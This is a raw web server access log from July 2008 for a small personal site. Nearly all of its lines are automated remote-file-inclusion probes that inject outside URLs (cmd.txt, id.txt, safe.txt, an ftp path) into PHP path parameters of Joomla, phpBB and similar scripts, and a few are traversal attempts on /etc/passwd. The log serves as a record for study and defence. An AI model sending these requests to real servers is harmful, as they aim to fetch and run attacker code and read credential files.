216.117.167.157 - - [09/Jul/2008:19:01:10 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
216.117.167.157 - - [09/Jul/2008:19:01:10 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.65"
91.121.137.51 - - [09/Jul/2008:19:01:14 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.137.51 - - [09/Jul/2008:19:01:14 -0500] "GET /errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.137.51 - - [09/Jul/2008:19:01:14 -0500] "GET /logs/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.38.22.250 - - [09/Jul/2008:19:01:50 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
64.38.22.250 - - [09/Jul/2008:19:01:50 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
64.38.22.250 - - [09/Jul/2008:19:01:50 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
85.236.38.117 - - [09/Jul/2008:19:02:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.freewebs.com/juventusal/JoN/cmd.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.805"
85.236.38.117 - - [09/Jul/2008:19:02:47 -0500] "GET //?path%5Bdocroot%5D=http://www.freewebs.com/juventusal/JoN/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
62.116.36.2 - - [09/Jul/2008:19:02:51 -0500] "GET /logs/errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.116.36.2 - - [09/Jul/2008:19:02:52 -0500] "GET /errors.php?error=http://kingsofwarcraft.com/info? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.116.36.2 - - [09/Jul/2008:19:03:17 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
62.116.36.2 - - [09/Jul/2008:19:03:18 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
216.86.157.145 - - [09/Jul/2008:19:03:42 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
216.86.157.145 - - [09/Jul/2008:19:03:42 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
87.106.98.71 - - [09/Jul/2008:19:04:55 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
87.106.98.71 - - [09/Jul/2008:19:04:55 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
65.91.249.193 - - [09/Jul/2008:19:05:43 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 352 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:05:43 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 352 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:05:43 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 347 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:05:43 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 347 "-""libwww-perl/5.813"
201.218.236.2 - - [09/Jul/2008:19:06:57 -0500] "GET /logs/access_log.1212278400//include.php?path[docroot]=http://www.shaker-diffusion.com/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
216.86.157.145 - - [09/Jul/2008:19:08:45 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
216.86.157.145 - - [09/Jul/2008:19:08:46 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
200.220.137.170 - - [09/Jul/2008:19:11:22 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://acadie-contest.com/helpid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.220.137.170 - - [09/Jul/2008:19:11:22 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://acadie-contest.com/helpid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
205.234.186.15 - - [09/Jul/2008:19:13:25 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
205.234.186.15 - - [09/Jul/2008:19:13:25 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
65.91.249.193 - - [09/Jul/2008:19:13:57 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:13:57 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:13:57 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:13:57 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
62.75.224.13 - - [09/Jul/2008:19:17:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.freewebs.com/juventusal/JoN/cmd.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.69"
62.75.224.13 - - [09/Jul/2008:19:17:09 -0500] "GET //?path%5Bdocroot%5D=http://www.freewebs.com/juventusal/JoN/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
82.194.70.164 - - [09/Jul/2008:19:24:53 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:24:53 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:24:59 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:25:00 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:25:01 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:25:02 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.108.66.115 - - [09/Jul/2008:19:26:11 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.108.66.115 - - [09/Jul/2008:19:26:11 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.98.71 - - [09/Jul/2008:19:26:49 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.98.71 - - [09/Jul/2008:19:26:49 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.186.55.91 - - [09/Jul/2008:19:26:50 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.186.55.91 - - [09/Jul/2008:19:26:50 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.85.102.132 - - [09/Jul/2008:19:27:18 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
65.91.249.193 - - [09/Jul/2008:19:27:19 -0500] "GET /logs//com_thopper/index.php?option=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:27:20 -0500] "GET /logs//com_thopper/index.php?option=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:27:20 -0500] "GET //com_thopper/index.php?option=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:27:20 -0500] "GET //com_thopper/index.php?option=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
65.214.45.149 - - [09/Jul/2008:19:27:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
116.125.113.115 - - [09/Jul/2008:19:30:02 -0500] "GET /logs//admin.php?include_path=http://5score.org/poll/misc/.info/coi.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
116.125.113.115 - - [09/Jul/2008:19:30:02 -0500] "GET //admin.php?include_path=http://5score.org/poll/misc/.info/coi.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
116.125.113.115 - - [09/Jul/2008:19:30:03 -0500] "GET //admin.php?include_path=http://5score.org/poll/misc/.info/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
116.125.113.115 - - [09/Jul/2008:19:30:03 -0500] "GET /logs//admin.php?include_path=http://5score.org/poll/misc/.info/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
212.34.140.215 - - [09/Jul/2008:19:31:04 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
212.34.140.215 - - [09/Jul/2008:19:31:04 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
190.54.62.72 - - [09/Jul/2008:19:31:39 -0500] "GET /?path%5Bdocroot%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
190.54.62.72 - - [09/Jul/2008:19:31:43 -0500] "GET /logs/?path%5Bdocroot%5D=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 90748 "-""libwww-perl/5.79"
217.160.76.187 - - [09/Jul/2008:19:31:53 -0500] "GET /logs//ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:19:31:54 -0500] "GET //ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:19:31:57 -0500] "GET /logs//ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:19:31:58 -0500] "GET //ashnews.php?pathtoashnews=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
216.86.157.145 - - [09/Jul/2008:19:32:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.86.157.145 - - [09/Jul/2008:19:32:43 -0500] "GET //skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
87.106.101.24 - - [09/Jul/2008:19:33:26 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:33:26 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:33:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:33:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:33:40 -0500] "GET //skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
82.194.70.164 - - [09/Jul/2008:19:33:40 -0500] "GET //skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:33:50 -0500] "GET /logs//eqdkp//includes/dbal.php?eqdkp_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:33:50 -0500] "GET //eqdkp//includes/dbal.php?eqdkp_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.23.245.32 - - [09/Jul/2008:19:33:59 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
213.23.245.32 - - [09/Jul/2008:19:34:00 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
87.106.98.71 - - [09/Jul/2008:19:34:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.106.98.71 - - [09/Jul/2008:19:34:56 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.186.55.91 - - [09/Jul/2008:19:35:04 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
213.186.55.91 - - [09/Jul/2008:19:35:04 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://bglradio.net/WebCalendar/id2.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
65.91.249.193 - - [09/Jul/2008:19:35:21 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:35:21 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:35:21 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:35:21 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
216.117.167.157 - - [09/Jul/2008:19:35:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
216.117.167.157 - - [09/Jul/2008:19:35:37 -0500] "GET //skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
212.34.140.215 - - [09/Jul/2008:19:36:21 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
212.34.140.215 - - [09/Jul/2008:19:36:21 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
207.58.181.13 - - [09/Jul/2008:19:36:45 -0500] "GET /logs//errors.php?error=http://test123456.altervista.org/spreading.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
207.58.181.13 - - [09/Jul/2008:19:36:45 -0500] "GET //errors.php?error=http://test123456.altervista.org/spreading.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
212.158.128.74 - - [09/Jul/2008:19:36:48 -0500] "GET /logs//atom.php5?page=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.158.128.74 - - [09/Jul/2008:19:36:49 -0500] "GET //atom.php5?page=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.34.140.215 - - [09/Jul/2008:19:36:50 -0500] "GET /logs//eqdkp//includes/dbal.php?eqdkp_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.34.140.215 - - [09/Jul/2008:19:36:51 -0500] "GET //eqdkp//includes/dbal.php?eqdkp_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.106.101.24 - - [09/Jul/2008:19:37:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:37:14 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.108.66.115 - - [09/Jul/2008:19:37:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.66.115 - - [09/Jul/2008:19:37:56 -0500] "GET //skin/zero_vote/error.php?dir=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
70.77.43.61 - - [09/Jul/2008:19:39:22 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:39:22 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:39:22 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:39:23 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:39:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
70.77.43.61 - - [09/Jul/2008:19:39:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
76.237.119.26 - - [09/Jul/2008:19:44:00 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.64"
76.237.119.26 - - [09/Jul/2008:19:44:00 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://h1.ripway.com/cakilham/taek.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.64"
87.106.101.24 - - [09/Jul/2008:19:44:34 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
87.106.101.24 - - [09/Jul/2008:19:44:34 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
74.6.8.88 - - [09/Jul/2008:19:47:33 -0500] "GET /logs/access_log.1170547200 HTTP/1.0" 200 100323 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
205.234.234.3 - - [09/Jul/2008:19:48:26 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/fexcia/id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
205.234.234.3 - - [09/Jul/2008:19:48:26 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.geocities.com/fexcia/id2.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
205.234.234.3 - - [09/Jul/2008:19:48:26 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/fexcia/id2.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
66.7.197.76 - - [09/Jul/2008:19:49:16 -0500] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
66.7.197.76 - - [09/Jul/2008:19:49:16 -0500] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
217.160.76.187 - - [09/Jul/2008:19:49:20 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:19:49:27 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
65.91.249.193 - - [09/Jul/2008:19:49:56 -0500] "GET /logs/big.php?pathtotemplate=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:49:56 -0500] "GET /logs/big.php?pathtotemplate=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 296 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:49:56 -0500] "GET /big.php?pathtotemplate=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.813"
65.91.249.193 - - [09/Jul/2008:19:49:56 -0500] "GET /big.php?pathtotemplate=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 291 "-""libwww-perl/5.813"
217.160.76.187 - - [09/Jul/2008:19:50:01 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.76"
217.160.76.187 - - [09/Jul/2008:19:50:01 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://test123456.altervista.org/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
66.7.197.76 - - [09/Jul/2008:19:52:04 -0500] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
66.7.197.76 - - [09/Jul/2008:19:52:04 -0500] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
203.177.42.133 - - [09/Jul/2008:19:52:53 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
203.177.42.133 - - [09/Jul/2008:19:52:58 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
62.44.72.247 - - [09/Jul/2008:19:53:32 -0500] "GET /logs//?pg=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 200 90753 "-""libwww-perl/5.803"
62.44.72.247 - - [09/Jul/2008:19:53:32 -0500] "GET //?pg=http://sujianto.com/xpl/load.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
70.77.43.61 - - [09/Jul/2008:19:57:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
